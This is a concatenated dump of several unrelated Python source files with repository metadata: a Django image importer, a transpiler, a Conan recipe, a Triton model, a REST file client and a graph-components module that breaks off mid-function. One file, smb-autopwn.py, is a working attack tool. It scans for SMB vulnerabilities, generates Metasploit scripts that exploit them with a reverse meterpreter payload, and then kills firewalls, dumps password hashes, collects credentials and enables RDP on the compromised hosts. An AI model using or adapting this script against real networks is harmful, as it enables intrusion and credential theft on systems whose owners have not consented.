imgrcd.lat = im_dict['lat']
imgrcd.lon = im_dict['lon']
imgrcd.location = Point(imgrcd.lon, imgrcd.lat)
imgrcd.altitude = im_dict['altim']
e = conn.cursor()
e.execute('SELECT * FROM imagedata WHERE _id=?;', (im_dict['_id'],))
img = e.fetchone()
img_dict = dict(img)
# save the full image locally - this should probably be put in a temp directory
blob = img_dict['data']
local_filename = im_dict['text']
with open(local_filename, 'wb') as output_file:
output_file.write(blob)
# Rotate the image if an orientation tag is available
try:
image = Image.open(local_filename)
for orientation in ExifTags.TAGS.keys():
if ExifTags.TAGS[orientation] == 'Orientation':
break
exif = dict(image._getexif().items())
if exif[orientation] == 3:
image = image.rotate(180, expand=True)
elif exif[orientation] == 6:
image = image.rotate(270, expand=True)
elif exif[orientation] == 8:
image = image.rotate(90, expand=True)
image.save(local_filename)
image.close()
except (AttributeError, KeyError, IndexError):
# cases: image doesn't have getexif
pass
qf = open(local_filename, 'rb')
imgrcd.image = File(qf)
# the thumbnail - also should be placed in a temp directory
blob = img_dict['thumbnail']
thmname = 'thm_{0}'.format(local_filename)
with open(thmname, 'wb') as output_file:
output_file.write(blob)
qt = open(thmname, 'rb')
imgrcd.thumbnail = File(qt)
# save the newly created image record
imgrcd.save()
# clean up temporary image files
qf.close()
try:
os.remove(local_filename)
except OSError as err:
pass
qt.close()
try:
os.remove(thmname)
except OSError as err:
pass
# clean up the temporary sqlite3 file
userproject.close()
try:
os.remove(userproject.name)
except OSError as err:
pass
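# A minimal sketch of queueing this task asynchronously (hypothetical file
# path and user id):
#   LoadUserProject.delay('uploads/project.gpap', request.user.id)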
| 41.486842 | 115 | 0.621154 | 786 | 6,306 | 4.895674 | 0.342239 | 0.014033 | 0.022089 | 0.025988 | 0.118763 | 0.065748 | 0.048857 | 0.017152 | 0 | 0 | 0 | 0.007799 | 0.288297 | 6,306 | 151 | 116 | 41.761589 | 0.849599 | 0.251982 | 0 | 0.180952 | 0 | 0 | 0.065016 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0.009524 | false | 0.038095 | 0.114286 | 0 | 0.12381 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 |
0b4965ed011d284f6111fffd9796620883222efb | 1,763 | py | Python | transpiler/flex_transpiler.py | thegenuinegourav/transpiler-wit | 021ce6f423a0a372761d5a3440327bf96140592f | [
"MIT"
] | null | null | null | transpiler/flex_transpiler.py | thegenuinegourav/transpiler-wit | 021ce6f423a0a372761d5a3440327bf96140592f | [
"MIT"
] | null | null | null | transpiler/flex_transpiler.py | thegenuinegourav/transpiler-wit | 021ce6f423a0a372761d5a3440327bf96140592f | [
"MIT"
] | null | null | null | #! /usr/bin/env python3
'''
The Flex Transpiler.
Usage:
flex_transpiler <source> -l <lang> [-o <output>]
flex_transpiler -h
Arguments:
<source> Path to the input Flex source file.
Options:
-l <lang>, --target-language <lang> The target language to transpile to.
-o <output>, --output <output> Path to the generated output file.
-h, --help Print this help text.
Target languages available:
python
'''
from os import environ
from docopt import docopt
import requests
API_URL = 'https://api.wit.ai/message?v=22/02/2018'
def generate_code(response, language):
intent = response['entities']['intent'][0]['value']
if language == 'python':
from languages.python import code
elif language == 'c++':
from languages.c_plus_plus import code
kwargs = {}
for entity in code[intent]['entities']:
kwargs[entity] = response['entities'][entity][0]['value']
return code[intent]['code'].format_map(kwargs)
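# generate_code() assumes each language module exposes a mapping like the
# hypothetical sketch below (illustrative only, not the real languages/python.py):
#   code = {
#       'print': {
#           'entities': ['message'],
#           'code': 'print("{message}")\n',
#       },
#   }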
if __name__ == '__main__':
args = docopt(__doc__)
source_file_path = args['<source>']
target_language = args['--target-language']
output_file_path = args['--output']
headers = { 'Authorization': 'Bearer ' + environ['WIT_AUTH'] }
code = []
with open(source_file_path, 'r') as source:
source_lines = source.readlines()
for line in source_lines:
if not line.isspace(): # line is not "blank"
params = { 'q': line }
response = requests.get(API_URL, params=params, headers=headers).json()
code.append(generate_code(response=response, language=target_language))
with open(output_file_path, 'w') as output:
output.writelines(code)
| 27.984127 | 87 | 0.627907 | 216 | 1,763 | 4.967593 | 0.425926 | 0.065238 | 0.016775 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0.008215 | 0.240499 | 1,763 | 62 | 88 | 28.435484 | 0.793129 | 0.266024 | 0 | 0 | 0 | 0 | 0.127626 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0.033333 | false | 0 | 0.166667 | 0 | 0.233333 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 |
0b4dc36d98d66803421d0547a2966e1f1f05b769 | 3,204 | py | Python | recipes/termcap/all/conanfile.py | flexferrum/conan-center-index | 5d0fb36e1e0b757e6deebc330c34d07dc1a5a7a5 | [
"MIT"
] | 3 | 2020-04-16T15:01:33.000Z | 2022-01-13T08:05:47.000Z | recipes/termcap/all/conanfile.py | flexferrum/conan-center-index | 5d0fb36e1e0b757e6deebc330c34d07dc1a5a7a5 | [
"MIT"
] | 33 | 2020-02-18T15:54:50.000Z | 2022-03-28T08:54:10.000Z | recipes/termcap/all/conanfile.py | GavinNL/conan-center-index | 0ae829a362c1cc6a20d97e023ca0aafc805797c3 | [
"MIT"
] | 8 | 2020-03-06T14:38:18.000Z | 2022-03-28T08:41:15.000Z | import os
from conans import ConanFile, CMake, tools
import re
import shutil
class TermcapConan(ConanFile):
name = "termcap"
homepage = "https://www.gnu.org/software/termcap"
url = "https://github.com/conan-io/conan-center-index"
description = "Enables programs to use display terminals in a terminal-independent manner"
license = "GPL-2.0"
topics = ("conan", "termcap", "terminal", "display")
exports_sources = ["CMakeLists.txt", "patches/*"]
generators = "cmake"
settings = "os", "arch", "compiler", "build_type"
options = {"shared": [True, False], "fPIC": [True, False], }
default_options = {"shared": False, "fPIC": True, }
@property
def _source_subfolder(self):
return "source_subfolder"
def config_options(self):
if self.settings.os == "Windows":
del self.options.fPIC
def configure(self):
del self.settings.compiler.libcxx
del self.settings.compiler.cppstd
def source(self):
archive_name = self.name + "-" + self.version
tools.get(**self.conan_data["sources"][self.version])
os.rename(archive_name, self._source_subfolder)
def _extract_sources(self):
makefile_text = open(os.path.join(self._source_subfolder, "Makefile.in")).read()
sources = list("{}/{}".format(self._source_subfolder, src) for src in re.search("\nSRCS = (.*)\n", makefile_text).group(1).strip().split(" "))
headers = list("{}/{}".format(self._source_subfolder, src) for src in re.search("\nHDRS = (.*)\n", makefile_text).group(1).strip().split(" "))
autoconf_text = open(os.path.join(self._source_subfolder, "configure.in")).read()
optional_headers = re.search(r"AC_HAVE_HEADERS\((.*)\)", autoconf_text).group(1).strip().split(" ")
return sources, headers, optional_headers
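# For illustration (hypothetical Makefile.in content), a line such as
#   SRCS = termcap.c tparam.c version.c
# would yield sources == ['source_subfolder/termcap.c', ...].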
def _configure_cmake(self):
cmake = CMake(self)
sources, headers, optional_headers = self._extract_sources()
cmake.definitions["TERMCAP_SOURCES"] = ";".join(sources)
cmake.definitions["TERMCAP_HEADERS"] = ";".join(headers)
cmake.definitions["TERMCAP_INC_OPTS"] = ";".join(optional_headers)
cmake.verbose = True
cmake.parallel = False
cmake.configure()
return cmake
def _patch_sources(self):
for patch in self.conan_data["patches"][self.version]:
tools.patch(**patch)
for src in self._extract_sources()[0]:
txt = open(src).read()
with open(src, "w") as f:
f.write("#include \"termcap_intern.h\"\n\n")
f.write(txt)
def build(self):
self._patch_sources()
cmake = self._configure_cmake()
cmake.build()
def package(self):
self.copy(pattern="COPYING", dst="licenses", src=self._source_subfolder)
cmake = self._configure_cmake()
cmake.install()
def package_info(self):
self.cpp_info.names["cmake_find_package"] = "Termcap"
self.cpp_info.names["cmake_find_package_multi"] = "Termcap"
self.cpp_info.libs = tools.collect_libs(self)
if self.options.shared:
self.cpp_info.definitions = ["TERMCAP_SHARED"]
| 39.555556 | 150 | 0.634207 | 383 | 3,204 | 5.130548 | 0.342037 | 0.061069 | 0.058015 | 0.022901 | 0.187277 | 0.148601 | 0.148601 | 0.086514 | 0.048855 | 0.048855 | 0 | 0.002388 | 0.215668 | 3,204 | 80 | 151 | 40.05 | 0.779546 | 0 | 0 | 0.029412 | 0 | 0 | 0.1701 | 0.014669 | 0 | 0 | 0 | 0 | 0 | 1 | 0.147059 | false | 0 | 0.058824 | 0.014706 | 0.426471 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 |
0b4ec54b5d195dc5f3df6daf6145850eb3ea00a2 | 7,935 | py | Python | smb-autopwn.py | DanMcInerney/smb-autopwn | fb110143f86e90ea3519b1701c697c8c503b0f4b | [
"MIT"
] | 50 | 2018-03-02T00:48:01.000Z | 2021-09-26T16:36:43.000Z | smb-autopwn.py | MrHacker46/smb-autopwn | fb110143f86e90ea3519b1701c697c8c503b0f4b | [
"MIT"
] | null | null | null | smb-autopwn.py | MrHacker46/smb-autopwn | fb110143f86e90ea3519b1701c697c8c503b0f4b | [
"MIT"
] | 23 | 2018-03-02T00:48:02.000Z | 2021-08-23T19:37:34.000Z | #!/usr/bin/env python
import os
from subprocess import Popen, PIPE, STDOUT, CalledProcessError
from netaddr import IPNetwork, AddrFormatError
import sys
from libnmap.process import NmapProcess
from libnmap.parser import NmapParser, NmapParserException
import netifaces
import argparse
from termcolor import colored
import time
def parse_args():
# Create the arguments
parser = argparse.ArgumentParser()
parser.add_argument("-l", "--hostlist", help="Host list file")
return parser.parse_args()
# Colored terminal output
def print_bad(msg):
print(colored('[-] ', 'red') + msg)
def print_info(msg):
print(colored('[*] ', 'blue') + msg)
def print_good(msg):
print(colored('[+] ', 'green') + msg)
def print_great(msg):
print(colored('[!] {}'.format(msg), 'yellow', attrs=['bold']))
def parse_nmap(args):
'''
Either performs an Nmap scan or parses an Nmap xml file
Will either return the parsed report or exit script
'''
if args.hostlist:
hosts = []
with open(args.hostlist, 'r') as hostlist:
host_lines = hostlist.readlines()
for line in host_lines:
line = line.strip()
try:
if '/' in line:
hosts += [str(ip) for ip in IPNetwork(line)]
elif '*' in line:
print_bad('CIDR notation only in the host list, e.g. 10.0.0.0/24')
sys.exit()
else:
hosts.append(line)
except (OSError, AddrFormatError):
print_bad('Error importing host list file. Are you sure you chose the right file?')
sys.exit()
report = nmap_scan(hosts)
return report
def nmap_status_printer(nmap_proc):
'''
Prints that Nmap is running
'''
i = -1
x = -.5
while nmap_proc.is_running():
i += 1
# Every 30 seconds print that Nmap is still running
if i % 30 == 0:
x += .5
print_info("Nmap running: {} min".format(str(x)))
time.sleep(1)
def run_proc(cmd):
'''
Runs single commands
ntlmrelayx needs the -c "powershell ... ..." cmd to be one arg tho
'''
cmd_split = cmd.split()
print_info('Running: {}'.format(cmd))
proc = Popen(cmd_split, stdout=STDOUT, stderr=STDOUT)
return proc
def run_proc_xterm(cmd):
'''
Runs a process in an xterm window that doesn't die with the parent script
'''
xterm_cmd = 'nohup xterm -hold -e {}'
full_cmd = xterm_cmd.format(cmd)
print_info('Running: {}'.format(full_cmd))
# Split it only on xterm args, leave system command in 1 string
cmd_split = full_cmd.split(' ', 4)
# preexec_fn allows the xterm window to stay alive after closing script
proc = Popen(cmd_split, stdout=PIPE, stderr=PIPE, preexec_fn=os.setpgrp)
return proc
def nmap_scan(hosts):
'''
Do Nmap scan
'''
nmap_args = '-sS -T4 --script smb-vuln-ms17-010,smb-vuln-ms08-067 -n --max-retries 5 -p 445 -oA smb-scan'
nmap_proc = NmapProcess(targets=hosts, options=nmap_args, safe_mode=False)
rc = nmap_proc.sudo_run_background()
nmap_status_printer(nmap_proc)
report = NmapParser.parse_fromfile(os.getcwd()+'/smb-scan.xml')
return report
def get_hosts(args, report):
'''
Gets the list of hosts with port 445 open
'''
hosts = []
print_info('Parsing hosts')
for host in report.hosts:
if host.is_up():
# Get open services
for s in host.services:
if s.port == 445:
if s.state == 'open':
hosts.append(host)
if len(hosts) == 0:
print_bad('No hosts with port 445 open')
sys.exit()
return hosts
def get_vuln_hosts(hosts):
'''
Parse NSE scripts to find vulnerable hosts
'''
vuln_hosts = {}
nse_scripts = ['smb-vuln-ms17-010', 'smb-vuln-ms08-067']
for host in hosts:
ip = host.address
# Check NSE script results for vulnerability findings
for script_out in host.scripts_results:
for script in nse_scripts:
if script_out['id'] == script:
if 'State: VULNERABLE' in script_out['output']:
print_good('NSE script {} found vulnerable host: {}'.format(script, ip))
if vuln_hosts.get(ip):
vuln_hosts[ip].append(script)
else:
vuln_hosts[ip] = [script]
return vuln_hosts
def get_local_ip(iface):
'''
Gets the local IP of an interface
'''
ip = netifaces.ifaddresses(iface)[netifaces.AF_INET][0]['addr']
return ip
def get_iface():
'''
Gets the right interface
'''
try:
iface = netifaces.gateways()['default'][netifaces.AF_INET][1]
except:
ifaces = []
for iface in netifaces.interfaces():
# list of ipv4 addrinfo dicts
ipv4s = netifaces.ifaddresses(iface).get(netifaces.AF_INET, [])
for entry in ipv4s:
addr = entry.get('addr')
if not addr:
continue
if not (iface.startswith('lo') or addr.startswith('127.')):
ifaces.append(iface)
iface = ifaces[0]
return iface
def create_rc_file(vuln_hosts):
local_ip = get_local_ip(get_iface())
port = '443'
# Create AutoRunScripts
with open('autorun.rc', 'w') as ar:
ar.write('run post/windows/manage/migrate\n'
'run post/windows/manage/killfw\n'
'run post/windows/gather/hashdump\n'
'run post/windows/manage/wdigest_caching\n'
'run post/windows/gather/credentials/credential_collector\n'
'run post/windows/manage/enable_rdp\n')
# Start listener
#start_handler_lines = ('use exploit/multi/handler\n'
# 'set PAYLOAD windows/meterpreter/reverse_https\n'
# 'set LHOST {}\n'
# 'set LPORT {}\n'
# 'set ExitOnSession false\n'
# 'exploit -j -z\n'
# 'set AutoRunScript multi_console_command -rc autorun.rc\n'.format(local_ip, port))
start_autorunscript = 'set AutoRunScript multi_console_command -rc autorun.rc\n'
# Exploit ms17-010
ms17010_lines = ('use exploit/windows/smb/ms17_010_eternalblue\n'
'set RHOST {}\n'
'set MaxExploitAttempts 5\n'
'set payload windows/meterpreter/reverse_https\n'
'set LHOST {}\n'
'set LPORT {}\n'
'exploit -j -z\n')
# Exploit ms08-067
ms08067_lines = ('use exploit/windows/smb/ms08_067_netapi\n'
'set RHOST {}\n'
'set payload windows/meterpreter/reverse_https\n'
'set LHOST {}\n'
'set LPORT {}\n'
'exploit -j -z\n')
with open('autopwn.rc', 'w') as f:
f.write(start_autorunscript)
for ip in vuln_hosts:
for nse in vuln_hosts[ip]:
if 'ms17-010' in nse:
f.write(ms17010_lines.format(ip, local_ip, port))
elif 'ms08-067' in nse:
f.write(ms08067_lines.format(ip, local_ip, port))
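# For a host flagged by smb-vuln-ms17-010 (illustrative values: target
# 10.0.0.7, local IP 10.0.0.5), the generated autopwn.rc would contain:
#   set AutoRunScript multi_console_command -rc autorun.rc
#   use exploit/windows/smb/ms17_010_eternalblue
#   set RHOST 10.0.0.7
#   set MaxExploitAttempts 5
#   set payload windows/meterpreter/reverse_https
#   set LHOST 10.0.0.5
#   set LPORT 443
#   exploit -j -z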
def main(report, args):
hosts = get_hosts(args, report)
vuln_hosts = get_vuln_hosts(hosts)
create_rc_file(vuln_hosts)
proc = run_proc_xterm('msfconsole -r autopwn.rc')
if __name__ == "__main__":
args = parse_args()
if os.geteuid():
print_bad('Run as root')
sys.exit()
report = parse_nmap(args)
main(report, args)
| 31.74 | 111 | 0.563957 | 986 | 7,935 | 4.409736 | 0.292089 | 0.012879 | 0.019319 | 0.017249 | 0.174333 | 0.099356 | 0.088316 | 0.088316 | 0.075437 | 0.075437 | 0 | 0.022558 | 0.324008 | 7,935 | 249 | 112 | 31.86747 | 0.788031 | 0.165217 | 0 | 0.1625 | 0 | 0.0125 | 0.188972 | 0.064281 | 0 | 0 | 0 | 0 | 0 | 1 | 0.1 | false | 0 | 0.0625 | 0 | 0.21875 | 0.11875 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 |
0b4ef999d97ae9394309f0ac09086a7585a37931 | 1,191 | py | Python | serve/tests/unittests/triton/expected_files/py_to_triton_test/1/model.py | shiyu22/towhee | 3e7b24aefb20f3e6452da115bf7e47e6261d65eb | [
"Apache-2.0"
] | null | null | null | serve/tests/unittests/triton/expected_files/py_to_triton_test/1/model.py | shiyu22/towhee | 3e7b24aefb20f3e6452da115bf7e47e6261d65eb | [
"Apache-2.0"
] | null | null | null | serve/tests/unittests/triton/expected_files/py_to_triton_test/1/model.py | shiyu22/towhee | 3e7b24aefb20f3e6452da115bf7e47e6261d65eb | [
"Apache-2.0"
] | null | null | null | import towhee
import numpy
from towhee import ops
import triton_python_backend_utils as pb_utils
class TritonPythonModel:
def initialize(self, args):
# create op instance
task = getattr(ops, 'local')
init_args = {}
self.op = getattr(task, 'triton_py')(**init_args)
def execute(self, requests):
responses = []
for request in requests:
# get input tensors from request
in0 = pb_utils.get_input_tensor_by_name(request, 'INPUT0')
# create input args from tensors
arg0 = in0.as_numpy()[0].decode('utf-8')
# call callable object
result0 = self.op(arg0)
# convert results to tensors
out0 = pb_utils.Tensor('OUTPUT0', numpy.array(result0, numpy.int8))
out1 = pb_utils.Tensor('OUTPUT1', numpy.array([result0.mode], numpy.object_))
# organize response
response = pb_utils.InferenceResponse(output_tensors=[out0, out1])
responses.append(response)
return responses
def finalize(self):
pass
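# A minimal client-side sketch (hypothetical server URL and model name,
# assuming the standard tritonclient package is available):
#   import numpy as np
#   import tritonclient.http as httpclient
#   client = httpclient.InferenceServerClient(url='localhost:8000')
#   inp = httpclient.InferInput('INPUT0', [1], 'BYTES')
#   inp.set_data_from_numpy(np.array(['cat.jpg'], dtype=object))
#   result = client.infer('py_to_triton_test', inputs=[inp])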
| 28.357143 | 89 | 0.570109 | 127 | 1,191 | 5.204724 | 0.519685 | 0.05295 | 0.039334 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0.021739 | 0.343409 | 1,191 | 41 | 90 | 29.04878 | 0.823529 | 0.122586 | 0 | 0 | 0 | 0 | 0.037572 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0.136364 | false | 0.045455 | 0.181818 | 0 | 0.409091 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 |
0b52d87b14c5b5a8fe3ff82e0f7d032c502a6439 | 381 | py | Python | audmath/__init__.py | audeering/audmath | 3f6fee1ce0bf00c50f16fe41c15fc2fda8635128 | [
"MIT"
] | null | null | null | audmath/__init__.py | audeering/audmath | 3f6fee1ce0bf00c50f16fe41c15fc2fda8635128 | [
"MIT"
] | 2 | 2021-07-29T08:35:32.000Z | 2021-07-30T08:47:59.000Z | audmath/__init__.py | audeering/audmath | 3f6fee1ce0bf00c50f16fe41c15fc2fda8635128 | [
"MIT"
] | null | null | null | from audmath.core.api import (
inverse_normal_distribution,
)
# Discourage from audmath import *
__all__ = []
# Dynamically get the version of the installed module
try:
import pkg_resources
__version__ = pkg_resources.get_distribution(__name__).version
except Exception: # pragma: no cover
pkg_resources = None # pragma: no cover
finally:
del pkg_resources
| 23.8125 | 66 | 0.753281 | 47 | 381 | 5.702128 | 0.617021 | 0.179104 | 0.097015 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0.183727 | 381 | 15 | 67 | 25.4 | 0.861736 | 0.309711 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | false | 0 | 0.181818 | 0 | 0.181818 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 |
0b549d79d485f539309c0b7481a958861fd6ba74 | 767 | py | Python | kintone_rest_client/file.py | yamaryu0508/kintone-rest-client | f5f4c2337bcdb58db097d1e00996f12d69b85209 | [
"MIT"
] | null | null | null | kintone_rest_client/file.py | yamaryu0508/kintone-rest-client | f5f4c2337bcdb58db097d1e00996f12d69b85209 | [
"MIT"
] | null | null | null | kintone_rest_client/file.py | yamaryu0508/kintone-rest-client | f5f4c2337bcdb58db097d1e00996f12d69b85209 | [
"MIT"
] | null | null | null | import os
from simple_http_client import FormData
class File(object):
def __init__(self, client):
self.client = client
def upload_file(self, params):
file = params['file']
form = FormData()
name = None
if 'name' in file and 'data' in file:
name = file['name']
data = file['data']
elif 'path' in file:
path = file['path']
name = os.path.basename(path)
with open(path, 'rb') as f:
data = f.read()
form.add_file(
'file',
name,
data
)
return self.client.request(
path='/k/v1/file',
method='POST',
params=form
)
def download_file(self, params):
return self.client.request(
path='/k/v1/file',
method='GET',
params=params
) | 20.184211 | 41 | 0.568449 | 100 | 767 | 4.27 | 0.4 | 0.093677 | 0.065574 | 0.107728 | 0.187354 | 0.187354 | 0.187354 | 0.187354 | 0.187354 | 0 | 0 | 0.003711 | 0.297262 | 767 | 38 | 42 | 20.184211 | 0.788497 | 0 | 0 | 0.121212 | 0 | 0 | 0.079427 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0.090909 | false | 0 | 0.060606 | 0.030303 | 0.242424 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 |
0b55dcc63c4dda3f384e2b7b42f869523ce01193 | 19,131 | py | Python | straph/components/strongly_connected_component.py | busyweaver/Straph | b97a7b99ffab2416eb81df11073cc927f648fa10 | [
"Apache-2.0"
] | 3 | 2021-05-24T16:23:51.000Z | 2021-08-07T20:14:53.000Z | straph/components/strongly_connected_component.py | busyweaver/Straph | b97a7b99ffab2416eb81df11073cc927f648fa10 | [
"Apache-2.0"
] | 1 | 2021-05-25T12:30:36.000Z | 2021-05-25T12:30:36.000Z | straph/components/strongly_connected_component.py | busyweaver/Straph | b97a7b99ffab2416eb81df11073cc927f648fa10 | [
"Apache-2.0"
] | 3 | 2021-05-25T09:04:43.000Z | 2021-11-02T16:27:23.000Z | # Copyright (C) 2017-2021 Léo Rannou - Sorbonne Université/LIP6 - Thales
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
import copy
from straph import dags as cdag
from straph.components import ConnectedComponent
def compute_strongly_connected_components(S, format="object_with_links", condensation_dag=False, isolated_nodes=True,
streaming_output=None, free_memory=False):
"""
Compute Strongly Connected Components (SCC) of a ``StreamGraph``.
:param free_memory:
:param streaming_output:
:param isolated_nodes:
:param S: A Stream Graph
:param format: Format of the output; can be "cluster", "object", "object_with_links" or "streaming"
:param condensation_dag: Boolean, true if we want to output the Condensation DAG, false otherwise
:return:
"""
node_2_status = {} # Dictionary associating a node to its current status: (current degree, current component id)
tmp_components = [] # List of current strongly connected components (object)
final_components = [] # Clusters : [(t0,t1,u)]...
cnt_scc_id = 0
# Condensation DAG
if condensation_dag:
condensation_dag = cdag.CondensationDag()
else:
condensation_dag = None
#
id_wcc = S.id
E = S.ordered_batch_links(free_memory=free_memory)
if streaming_output:
opt = open(streaming_output, 'w')
else:
opt = None
for batch in E:
# print("\n Batch :",batch)
c = batch[0][0]
if c == 1: # ARRIVAL
cnt_scc_id = process_batch_link_arrival(batch, node_2_status, tmp_components,
final_components,
cnt_scc_id,
condensation_dag=condensation_dag,
format=format,
streaming_output=opt)
else: # DEPARTURE
cnt_scc_id = process_batch_link_departure(batch, node_2_status, tmp_components,
final_components,
cnt_scc_id,
condensation_dag=condensation_dag,
format=format,
streaming_output=opt)
# Add isolated Nodes
if isolated_nodes:
for c in S.isolated_nodes():
if format == "cluster":
final_components.append([c])
if condensation_dag:
condensation_dag.add_node([c])
elif format == "object" or format == "object_with_links":
c = StronglyConnectedComponent(id=cnt_scc_id,
times=[c[0], c[1]],
nodes={c[2]})
final_components.append(c)
if condensation_dag:
condensation_dag.add_node(c)
elif format == "streaming":
c = (c[0], c[1], 1)
if streaming_output:
opt.write(str(c[0]) + ";" + str(c[1]) + ";" + str(1))
opt.write("\n")
else:
final_components.append(c)
cnt_scc_id += 1
if condensation_dag:
condensation_dag.set_id(id_wcc)
return final_components, condensation_dag
else:
return final_components
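# A minimal usage sketch (assumes S is an already-built straph StreamGraph):
#   sccs, cdag = compute_strongly_connected_components(S, format="cluster",
#                                                      condensation_dag=True)
#   for comp in sccs:
#       print(comp)  # a cluster: [(t0, t1, u), ...]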
def merge_scc(l, node_2_status, tmp_components,
final_components,
condensation_dag=None,
cnt_scc_id=None,
format="cluster", streaming_output=None):
t0, t1, u, v = l
id_comp_u = node_2_status[u][1]
id_comp_v = node_2_status[v][1]
if len(tmp_components[id_comp_v].nodes) > len(tmp_components[id_comp_u].nodes):
# If a component is bigger than another we merge into the bigger one.
id_comp_u, id_comp_v = id_comp_v, id_comp_u
comp_1 = tmp_components[id_comp_u]
comp_2 = tmp_components[id_comp_v]
if comp_1.times[0] != t0:
cnt_scc_id = close_component(comp_1, t0, final_components, cnt_scc_id, condensation_dag=condensation_dag,
format=format, streaming_output=streaming_output)
# predecessor_in_dag[n_comp_1] += [cnt_scc_id - 1] # previous closed component
comp_1.set_begin_time(t0)
if comp_2.times[0] != t0:
cnt_scc_id = close_component(comp_2, t0, final_components, cnt_scc_id, condensation_dag=condensation_dag,
format=format, streaming_output=streaming_output)
# predecessor_in_dag[n_comp_1] += [cnt_scc_id - 1] # previous closed component (n_comp_1 because we merge)
for n in comp_2.nodes:
node_2_status[n][1] = id_comp_u # Update references before deleting the 2nd comp
comp_1.merge(comp_2)
comp_1.add_link(l) # Add the current link
node_2_status[u][0] += 1
node_2_status[v][0] += 1
tmp_components[id_comp_v] = None
return cnt_scc_id
def update_scc(node_to_update, node_to_add, l, node_2_status, tmp_components,
final_components,
condensation_dag=None,
cnt_scc_id=None,
format="cluster", streaming_output=None
):
"""
:param streaming_output:
:param format:
:param final_components:
:param node_to_update:
:param node_to_add:
:param l:
:param node_2_status:
:param tmp_components:
:param condensation_dag:
:param cnt_scc_id:
:return:
"""
t0, t1 = l[0], l[1]
id_current_comp = node_2_status[node_to_update][1]
current_comp = tmp_components[id_current_comp]
if current_comp.times[0] != t0:
cnt_scc_id = close_component(current_comp, t0, final_components, cnt_scc_id,
condensation_dag=condensation_dag,
format=format, streaming_output=streaming_output)
# predecessor_in_dag[n_current_comp] += [cnt_scc_id - 1] # previous closed component
current_comp.set_begin_time(t0) # Set a new beginning time
current_comp.add_node(node_to_add) # Add the node to the comp
current_comp.add_link(l) # Update the component with the new link
node_2_status[node_to_add] = [1, id_current_comp]
node_2_status[node_to_update][0] += 1
return cnt_scc_id
def create_scc(l, node_2_status, tmp_components, format="cluster"):
"""
Create a Strongly Connected Component from the link *l*
:param format:
:param l:
:param node_2_status:
:param tmp_components:
:return:
"""
t0, t1, u, v = l
new_id_comp = len(tmp_components)
node_2_status[u] = [1, new_id_comp]
node_2_status[v] = [1, new_id_comp]
if format == "object_with_links":
lks = [[t0, t1, u, v]]
else:
lks = None
tmp_components.append(StronglyConnectedComponent(times=[t0, t0],
nodes={u, v},
active_links={(u, v)},
links=lks))
def process_batch_link_arrival(batch, node_2_status, tmp_components, final_components,
cnt_scc_id, condensation_dag=None, format="cluster", streaming_output=None):
for b in batch:
t0, t1, u, v = b[1:]
l = (t0, t1, u, v)
if u not in node_2_status and v not in node_2_status:
create_scc(l, node_2_status, tmp_components, format=format)
elif u in node_2_status and v not in node_2_status:
cnt_scc_id = update_scc(u, v, l, node_2_status, tmp_components,
final_components,
condensation_dag=condensation_dag,
cnt_scc_id=cnt_scc_id,
format=format, streaming_output=streaming_output
)
elif u not in node_2_status and v in node_2_status:
cnt_scc_id = update_scc(v, u, l, node_2_status, tmp_components,
final_components,
condensation_dag=condensation_dag,
cnt_scc_id=cnt_scc_id,
format=format, streaming_output=streaming_output
)
elif node_2_status[u][1] != node_2_status[v][1]:
cnt_scc_id = merge_scc(l, node_2_status, tmp_components,
final_components,
condensation_dag=condensation_dag,
